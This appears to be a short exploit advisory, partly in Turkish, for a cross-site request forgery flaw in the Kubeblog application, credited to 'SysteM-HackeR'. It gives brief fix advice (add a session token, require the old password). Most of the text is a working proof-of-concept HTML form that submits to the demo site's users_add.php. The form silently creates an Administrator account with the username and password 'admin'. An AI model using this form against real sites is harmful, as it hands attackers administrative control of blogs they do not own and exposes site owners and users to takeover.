< ------------------- header data start ------------------- >

#############################################################

# Application Name : Kubeblog
# Vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : SysteM-HackeR

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form name=form1 method=post action=http://demos.kubelabs.com/kubeblog/adm/users_add.php>
<input name=username type=Text class=textbox id=username style=width:60% value=admin>
<input name=password type=password class=textbox id=password style=width:60% value=admin>
<input name=password2 type=password class=textbox id=password2 style=width:60% value=admin>
<select name=user_type>
<option value=’3’>Administrator</option></select>
<input name=Submit type=submit class=button value=Submit>
</form>


< -- bug code end of -- >